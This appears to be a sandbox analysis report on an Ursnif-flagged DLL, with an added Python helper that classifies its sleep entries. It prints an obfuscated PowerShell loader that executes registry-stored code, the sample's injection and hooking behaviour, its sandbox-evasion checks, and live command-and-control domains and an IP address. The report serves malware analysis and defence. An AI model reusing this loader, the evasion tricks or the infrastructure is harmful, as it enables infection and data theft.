Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1568:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{BA7B1CC8-D157-FCAE-2B8E-95F08FA29924}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{72D23258-290F-740E-43C6-6DE8275AF19C}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:612:120:WilError_01
Source: C:\Windows\SysWOW64\cmd.exe Mutant created: \Sessions\1\BaseNamedObjects\{82342662-F969-048B-93D6-3D78776AC12C}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{82DD54AC-F9FE-041C-93D6-3D78776AC12C}
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{AEF8588D-35E8-10DC-2FC2-3944D3167DB8}
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: data.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: data.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: data.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: data.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: data.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: data.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: data.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: data.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: h.pdb> source: powershell.exe, 0000000F.00000003.961179690.0000029E611B1000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdbXP source: powershell.exe, 0000000F.00000002.1028629479.0000029E4CF68000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdbXP source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdbXP source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdbXP source: powershell.exe, 00000011.00000002.994879898.0000026445852000.00000004.00000001.sdmp
Source: Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: loaddll32.exe, 00000000.00000002.1185778870.000000006E4FF000.00000002.00020000.sdmp, data.dll
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
Source: data.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: data.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: data.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: data.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: data.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B2263 push ecx; ret 0_2_6E4B2273
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B2210 push ecx; ret 0_2_6E4B2219
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD7AB0 push ecx; ret 0_2_00DD7AB9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD7E1F push ecx; ret 0_2_00DD7E2F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04584EE0 push ecx; ret 0_2_04584EE9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_045679B6 push ss; ret 0_2_045679B7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0458528F push ecx; ret 0_2_0458529F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BC4EE0 push ecx; ret 3_2_04BC4EE9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA79B6 push ss; ret 3_2_04BA79B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BC528F push ecx; ret 3_2_04BC529F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04A77AB0 push ecx; ret 5_2_04A77AB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04A77E1F push ecx; ret 5_2_04A77E2F
Source: C:\Windows\System32\control.exe Code function: 34_2_0093B1B5 push 3B000001h; retf 34_2_0093B1BA
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DB1B5 push 3B000001h; retf 45_2_000002D2D67DB1BA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_009679B6 push ss; ret 49_2_009679B7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0098528F push ecx; ret 49_2_0098529F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00984EE0 push ecx; ret 49_2_00984EE9
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B1552 LoadLibraryA,GetProcAddress, 0_2_6E4B1552
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
PE file contains an invalid checksum
Source: aixojixg.dll.20.dr Static PE information: real checksum: 0x0 should be: 0xee27
Source: keehvxm3.dll.24.dr Static PE information: real checksum: 0x0 should be: 0xeb64
Source: data.dll Static PE information: real checksum: 0x75958 should be: 0x7619a
Source: a52acufz.dll.19.dr Static PE information: real checksum: 0x0 should be: 0x2fa8
Source: ddwuzigh.dll.23.dr Static PE information: real checksum: 0x0 should be: 0x5f5e

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: RuntimeBroker.exe, 0000002E.00000000.995808507.000001B4F862A000.00000004.00000001.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\MSTRACER.DLLCR
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6080 Thread sleep time: -6456360425798339s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4875
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4340
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4102
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4861
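The sleep and delay entries above are printed as raw intervals, which makes them hard to read at a glance. The Python below is an added triage helper, not part of this report or of the sandbox: it parses these three entry types and classifies each one. Two facts drive the classification: relative NT wait intervals are negative numbers (the NtDelayExecution convention), so only the magnitude matters, and 922337203685477 is exactly INT64_MAX (0x7FFFFFFFFFFFFFFF) divided by 10,000, i.e. the largest representable 100 ns interval expressed in milliseconds, which is why the sandbox then reports that execution stopped while the process was sleeping. That the report's unit is milliseconds, and the thresholds used, are this example's assumptions. The sample lines are copied from the entries above.

```python
import re
from dataclasses import dataclass

# Constructed sample: the sleep/delay entries from this report, copied as they appear.
SAMPLE = r"""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6080 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4875
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4340
""".strip().splitlines()

INT64_MAX = (1 << 63) - 1
# A maximal relative NT interval (INT64_MAX x 100 ns) expressed in milliseconds is 922337203685477,
# exactly the "delay time" value this report prints (assumption: the report's unit is ms).
INFINITE_WAIT_MS = INT64_MAX // 10_000
LONG_SLEEP_MS = 3 * 60 * 1000   # the report's own ">= 3 min" bar for a long sleep
LOOP_CALLS = 1_000              # threshold for calling repeated delays a stalling loop (assumption)

SLEEP_RE = re.compile(r"^Source: (\S+) TID: (\d+) Thread sleep time: (-?\d+)s")
DELAY_RE = re.compile(r"^Source: (\S+) Thread delayed: delay time: (\d+)$")
LOOP_RE = re.compile(r"^Source: (\S+) Window / User API: threadDelayed (\d+)$")


@dataclass(frozen=True)
class Finding:
    process: str
    kind: str       # "sleep", "delay" or "loop"
    value: int
    verdict: str


def verdict_for_interval(value: int) -> str:
    """Classify one raw interval. Negative values are relative intervals in the
    NtDelayExecution convention, so the magnitude is what matters; the INT64_MAX
    sentinel means the thread asked to wait for an effectively unbounded time."""
    if value == INFINITE_WAIT_MS:
        return "infinite wait (INT64_MAX interval): effectively unbounded sleep"
    if abs(value) >= LONG_SLEEP_MS:
        return "long sleep (>= 3 min): time-based evasion"
    return "short sleep"


def triage(lines):
    """Parse the three entry types and attach a verdict to each; other lines are ignored."""
    findings = []
    for line in lines:
        if m := SLEEP_RE.match(line):
            value = int(m.group(3))
            findings.append(Finding(m.group(1), "sleep", value, verdict_for_interval(value)))
        elif m := DELAY_RE.match(line):
            value = int(m.group(2))
            findings.append(Finding(m.group(1), "delay", value, verdict_for_interval(value)))
        elif m := LOOP_RE.match(line):
            n = int(m.group(2))
            verdict = ("delay loop (possible stalling / user-activity check)"
                       if n >= LOOP_CALLS else "sparse delays")
            findings.append(Finding(m.group(1), "loop", n, verdict))
    return findings


def total_delay_calls(findings) -> int:
    """Sum of the threadDelayed call counts, i.e. how busy the stalling loop was."""
    return sum(f.value for f in findings if f.kind == "loop")


if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"{f.kind:5} {f.value:>20} {f.verdict}")
    print("delay calls:", total_delay_calls(triage(SAMPLE)))
```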
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457A5F6 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_0457A5F6
Source: explorer.exe, 0000001C.00000000.916169591.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: RuntimeBroker.exe, 00000030.00000000.1053923810.000001DA49E59000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001C.00000000.916169591.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: RuntimeBroker.exe, 0000002E.00000000.995808507.000001B4F862A000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ll
Source: loaddll32.exe, 00000000.00000003.884544314.0000000001342000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: loaddll32.exe, 00000000.00000003.884544314.0000000001342000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWen-USn
Source: explorer.exe, 0000001C.00000000.881750747.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 0000001C.00000000.889230048.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: RuntimeBroker.exe, 00000025.00000000.976191564.0000027D4E762000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: explorer.exe, 0000001C.00000000.889230048.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457CC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_0457CC4A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_0457198F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04580BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_04580BC5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BBCC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_04BBCC4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_04BB198F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BC0BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_04BC0BC5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0097198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 49_2_0097198F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00980BC5 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 49_2_00980BC5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0097CC4A FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, 49_2_0097CC4A

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B1552 LoadLibraryA,GetProcAddress, 0_2_6E4B1552
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_045737F9 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 0_2_045737F9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB37F9 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 3_2_04BB37F9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_009737F9 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 49_2_009737F9

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: init.icecreambob.com
Source: C:\Windows\explorer.exe Domain query: art.microsoftsofymicrosoftsoft.at
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 194.147.86.221 80
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Compiles code for process injection (via .Net compiler)
